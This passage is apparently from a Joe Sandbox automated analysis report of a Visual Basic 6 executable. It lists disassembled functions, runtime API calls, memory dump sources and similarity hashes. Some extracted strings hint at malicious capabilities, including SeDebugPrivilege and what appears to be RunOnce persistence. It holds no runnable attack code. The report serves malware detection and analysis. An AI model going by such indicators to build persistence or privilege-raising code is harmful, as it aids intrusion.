                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3FB
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E41B
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040E420
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E445
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071EC,00000078), ref: 0040E465
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040E46D
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007B0), ref: 0040E494
                                                                                                                                                                                  • #519.MSVBVM60(?), ref: 0040E49A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040E4A5
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040E4B9
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040E4C5
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?), ref: 0040E4CF
                                                                                                                                                                                  • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E4FC
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 0040E50E
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040E546), ref: 0040E53F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2502233557-0
                                                                                                                                                                                  • Opcode ID: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
                                                                                                                                                                                  • Instruction ID: 2210176cfa9892e4a02b66722b5e7dfe915d6efbf244aeeba38d0bb5bf168e27
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D514BB1901208ABDB00DFA5DD48EEEBBB8FF48704F10856AF505B72A0D774A945CF68
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00410B60 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 84COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • #712.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BAC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BB9
                                                                                                                                                                                  • #712.MSVBVM60(?,\\?\,00406674,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BCE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BD5
                                                                                                                                                                                  • #712.MSVBVM60(?,\SystemRoot\,00000000,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BEC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BF3
                                                                                                                                                                                  • #712.MSVBVM60(?,%systemroot%,00000000,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C0B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C12
                                                                                                                                                                                  • #712.MSVBVM60(?,00407458,004055FC,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C27
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C2E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C36
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00410C57,?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C50
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$#712Move$CopyFree
                                                                                                                                                                                  • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                                                                                                                  • API String ID: 2546659950-1311169778
                                                                                                                                                                                  • Opcode ID: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                                                                                                  • Instruction ID: 3cf452ae6fb0dfcbcd02110e459b44aaa686f69a821e3f1c8313cc58adc2f9c6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F214B70A54209BBCB04EB54CC82FEFBB79AB54710F204327B611B72D4DEB45945CAD4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00418B50 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                                                  • String ID: (%@
                                                                                                                                                                                  • API String ID: 3031735744-1462787901
                                                                                                                                                                                  • Opcode ID: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                                                  • Instruction ID: 2163017d223cc4516af4853558ee8a19d87b4fb9e6127d64d5f8f75e22c004d5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                                                  • Instruction Fuzzy Hash: C731FBB5800209ABCB04DFE4DE59FDE7B78FB48714F108569F211B72A0D7746A48CB68
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040FDD0 Relevance: 27.1, APIs: 18, Instructions: 122COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00401D48,004072B8,?,00000001), ref: 0040FE20
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FE2D
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004072C0,00000000), ref: 0040FE35
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FE3C
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FE40
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040FE52
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00401D48,00407390,?,-00000001), ref: 0040FE80
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE87
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004072C0,00000000,?,-00000001), ref: 0040FE8F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE96
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 0040FE9B
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 0040FEAD
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60 ref: 0040FEC0
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?,?), ref: 0040FEF3
                                                                                                                                                                                  • #631.MSVBVM60(?,-00000002,?,?), ref: 0040FF09
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 0040FF14
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 0040FF19
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 0040FF69
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 43011225-0
                                                                                                                                                                                  • Opcode ID: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                                                  • Instruction ID: f3b2892753be04fed0370ccfbe7307407226e01e24b32ae3149310476cb42e92
                                                                                                                                                                                  • Opcode Fuzzy Hash: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                                                  • Instruction Fuzzy Hash: C7417475A00209AFD714DFA4CD85E9E7B79FB89700F10413BF901B76A0DA74A948CBA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00410FB0 Relevance: 27.1, APIs: 18, Instructions: 106COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404BAC,?,?), ref: 0041103F
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041104B
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404BAC,00000094,?), ref: 00411064
                                                                                                                                                                                  • __vbaStrI4.MSVBVM60(?), ref: 00411077
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00411087
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00411095
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041109F
                                                                                                                                                                                  • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110A9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004110B3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004110B6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004110C0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 004110C8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004110D2
                                                                                                                                                                                  • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110DC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004110E6
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004110E9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004110F3
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 00411121
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Ansi$ErrorFreeListSystem
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 669208520-0
                                                                                                                                                                                  • Opcode ID: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                                                  • Instruction ID: 84428951c38bdac4841b214fd1cb50a500f43101e76cc919ffdd761ca84df74b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                                                  • Instruction Fuzzy Hash: AD410EB1D00218ABCB65EB65CD44BEABBB9EF48700F1041EAE509B3160DE746F85CF94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00418F30 Relevance: 25.7, APIs: 17, Instructions: 169COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(660E19DC,00000000,00000FEE), ref: 00418FAE
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(660E19DC,00000000,00000FEE), ref: 00418FC2
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00418FE9
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,00000000), ref: 00419003
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041901E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00419022
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?), ref: 0041902E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00419049
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00419052
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,-00000001), ref: 0041907B
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 0041908B
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 00419091
                                                                                                                                                                                  • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 004190A4
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(660E19DC,00000000,00000FEE), ref: 004190D1
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(660E19DC,00000000,00000FEE), ref: 004190E1
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,0041912C), ref: 00419125
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(660E19DC,00000000,00000FEE), ref: 0041913F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3281955820-0
                                                                                                                                                                                  • Opcode ID: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                                                  • Instruction ID: 4833bfc8c810be8c7ee48596b44bcdea636671ab31cf8706ef4dadcd7055b152
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A51B470A00215AFDB14DF64DDA5AFABBB5FB49740F21802AE505A7350C774ACC2CBA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040ACA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ACBE
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AD05
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( RO,00000000,?,?,?,?,004025E6), ref: 0040AD3D
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD48
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,?,004025E6), ref: 0040AD61
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD6C
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,?,004025E6), ref: 0040AD87
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( RO,00000000,?,?,004025E6), ref: 0040ADA2
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADAD
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,004025E6), ref: 0040ADC7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADD2
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,?,004025E6), ref: 0040ADED
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$FreeList$ChkstkError
                                                                                                                                                                                  • String ID: RO$Once
                                                                                                                                                                                  • API String ID: 3210543181-275216174
                                                                                                                                                                                  • Opcode ID: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
                                                                                                                                                                                  • Instruction ID: 52c490b129e582bc3dafaca85e5bb0199f8b140a8a0a8e676f0dccd7654b22b4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: C9413471900208EFD704DF94DE49BEEBBB8FB4C304F108129F916A72A0DB755A44CBA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00410C70 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,00000000,660E6C30,660E0EBE,00000000,004025E6), ref: 00410CBE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 00410D5A
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00410D6B
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00410D83
                                                                                                                                                                                  • __vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 00410DE0
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                  • API String ID: 1749655604-2896544425
                                                                                                                                                                                  • Opcode ID: f636320db0520c6460c5fd51245f71b2210e99ae5d457a238845d81d681894fc
                                                                                                                                                                                  • Instruction ID: 19430b606137baf8db46125749817fb036df22dc0e74aca3634fbbd968d53a81
                                                                                                                                                                                  • Opcode Fuzzy Hash: f636320db0520c6460c5fd51245f71b2210e99ae5d457a238845d81d681894fc
                                                                                                                                                                                  • Instruction Fuzzy Hash: E3512EB1900308DBDB14DFA1DA09BEEB7B8BB04704F20812EE105BB191D7B85A89DF55
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00418A10 Relevance: 22.6, APIs: 15, Instructions: 76COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00418A2E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00418A5B
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00418A67
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF), ref: 00418A76
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00418A8F
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418A9F
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AAD
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00418AB6
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?), ref: 00418ACB
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418ADB
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AE9
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00418AF2
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 00418B08
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00418B32), ref: 00418B22
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00418B2B
                                                                                                                                                                                  Memory Dump Source
